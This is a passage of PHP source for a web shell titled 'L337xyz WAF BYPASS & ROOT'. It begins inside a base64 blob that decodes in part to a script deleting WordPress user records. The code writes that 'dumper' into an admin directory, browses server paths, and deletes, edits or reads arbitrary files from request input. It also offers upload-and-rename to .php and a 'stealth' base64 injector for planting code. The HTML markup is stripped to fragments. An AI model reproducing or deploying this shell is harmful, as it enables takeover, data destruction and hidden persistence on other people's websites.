mUoIkRFTEVURSBGUk9NICR0YWJsZSBXSEVSRSB1c2VyaWQgPSA/Iik7CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgICRkZWwgPSAkcGRvLT5wcmVwYXJlKCJERUxFVEUgRlJPTSAkdGFibGUgV0hFUkUgSUQgPSA/Iik7CiAgICAgICAgfQogICAgICAgICRkZWwtPmV4ZWN1dGUoYXJyYXkoJHVpZCkpOwogICAgICAgIAogICAgICAgIC8vIE9wc2lvbmFsOiBIYXB1cyBqdWdhIG1ldGEgdXNlciBhZ2FyIGJlcnNpaCAodGFiZWwgd3BfdXNlcm1ldGEpCiAgICAgICAgLy8gS2l0YSBjb2JhIHRlYmFrIG5hbWEgdGFiZWwgbWV0YSBkYXJpIG5hbWEgdGFiZWwgdXNlciAod3BfdXNlcnMgLT4gd3BfdXNlcm1ldGEpCiAgICAgICAgaWYoIWlzc2V0KCRjbXNfdHlwZSkgfHwgJGNtc190eXBlID09ICdXb3JkUHJlc3MnKXsKICAgICAgICAgICAgICRtZXRhX3RhYmxlID0gc3RyX3JlcGxhY2UoJ3VzZXJzJywgJ3VzZXJtZXRhJywgJHRhYmxlKTsKICAgICAgICAgICAgICRkZWxfbWV0YSA9ICRwZG8tPnByZXBhcmUoIkRFTEVURSBGUk9NICRtZXRhX3RhYmxlIFdIRVJFIHVzZXJfaWQgPSA/Iik7CiAgICAgICAgICAgICB0cnkgewogICAgICAgICAgICAgICAgICRkZWxfbWV0YS0+ZXhlY3V0ZShhcnJheSgkdWlkKSk7CiAgICAgICAgICAgICB9IGNhdGNoKEV4Y2VwdGlvbiAkZSkgewogICAgICAgICAgICAgICAgIC8vIEFiYWlrYW4gamlrYSBnYWdhbCBoYXB1cyBtZXRhIChtdW5na2luIGJlZGEgcHJlZml4KQogICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICAKICAgICAgICBlY2hvICI8aDIgc3R5bGU9J2NvbG9yOnJlZCc+VXNlciBJRCAkdWlkIEJFUkhBU0lMIERJSEFQVVMgUEVSTUFORU4hPC9oMj4iOwogICAgICAgIGVjaG8gIjxtZXRhIGh0dHAtZXF1aXY9J3JlZnJlc2gnIGNvbnRlbnQ9JzInPiI7CiAgICB9Cgp9IGNhdGNoIChQRE9FeGNlcHRpb24gJGUpIHsKICAgIGRpZSgiPGgzIHN0eWxlPSdjb2xvcjpyZWQnPkRhdGFiYXNlIEVycm9yOiAiIC4gJGUtPmdldE1lc3NhZ2UoKSAuICI8L2gzPiIpOwp9IGNhdGNoIChFeGNlcHRpb24gJGUpIHsKICAgIGRpZSgiPGgzIHN0eWxlPSdjb2xvcjpyZWQnPkdlbmVyYWwgRXJyb3I6ICIgLiAkZS0+Z2V0TWVzc2FnZSgpIC4gIjwvaDM+Iik7Cn0KPz4="); if(file_put_contents($dumper_file, $dumper_code)){ echo ""; exit; } else { $msg .= "❌ Failed to write dumper file to $admin_dir (Check Permissions)
"; } } // MODE 3: DIRECTORY LISTING & ROOT // Path already determined at global scope: $path // Create Clickable Breadcrumbs (FIXED) $parts = explode('/', $path); $breadcrumbs = array(); $current_build = ""; foreach($parts as $p){ if($p == '') continue; $current_build .= "/" . $p; // Fix for double slash at start if any if(substr($current_build, 0, 2) == '//') $current_build = substr($current_build, 1); $breadcrumbs[] = "$p"; } $breadcrumb_html = implode(" / ", $breadcrumbs); // Add Root Link at start if empty or unix style if(empty($breadcrumb_html) || $path == '/') $breadcrumb_html = "/"; else $breadcrumb_html = "/ " . $breadcrumb_html; $files = scandir($path); $parent_dir = dirname($path); // New Upload Highlight $highlight = isset($_GET['highlight']) ? $_GET['highlight'] : ''; $dir_content = "

📂 Path: $breadcrumb_html


$db_output
"; foreach($files as $file){ if($file == '.' || $file == '..') continue; $full = "$path/$file"; $size = is_file($full) ? filesize($full) : "DIR"; $p_int = fileperms($full); $perms = substr(sprintf('%o', $p_int), -4); $color = is_writable($full) ? "#0f0" : "#f00"; // Highlight Row $row_style = ""; if($file === $highlight) $row_style = "style='background:#400;box-shadow:0 0 10px #f00;'"; // Icons $icon = "📄"; if(is_dir($full)) $icon = "📁"; else { $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); if(in_array($ext, array('jpg','jpeg','png','gif','bmp'))) $icon = "🖼️"; elseif(in_array($ext, array('php','phtml','php5'))) $icon = "🐘"; elseif(in_array($ext, array('zip','rar','tar','gz'))) $icon = "📦"; elseif(in_array($ext, array('html','htm','js','css'))) $icon = "🌐"; } $link_path = is_dir($full) ? $full : $path; $name_link = is_dir($full) ? "$file" : $file; // Actions $actions = ""; if(is_file($full)){ $web_link_file = get_web_path($full); $actions .= " "; } $dir_content .= ""; } $dir_content .= "
NameSizePermsAction
$icon $name_link $size $perms $actions
"; // DELETE ACTION if(isset($_POST['del'])){ $t = $_POST['del']; if(unlink($t)){ $msg .= "🗑️ Deleted: $t
"; } else { $msg .= "❌ Delete failed: $t
"; } } // EDIT VIEW if(isset($_GET['edit'])){ $v = $_GET['edit']; $content = htmlspecialchars(file_get_contents($v)); $dir_content = "

✏️ Edit: $v


"; } // VIEW ACTION (Read only) if(isset($_GET['view'])){ $v = $_GET['view']; $content = htmlspecialchars(file_get_contents($v)); $dir_content = "

📄 View: $v


"; } ?>

☠️ L337xyz WAF BYPASS & ROOT ☠️

Tools

Method 1: Upload & Rename (to )

Upload as .txt, Rename to .php
File:
Rename to:

Method 2: Base64 Injector (Stealth)

Paste Base64 encoded PHP code here
Filename: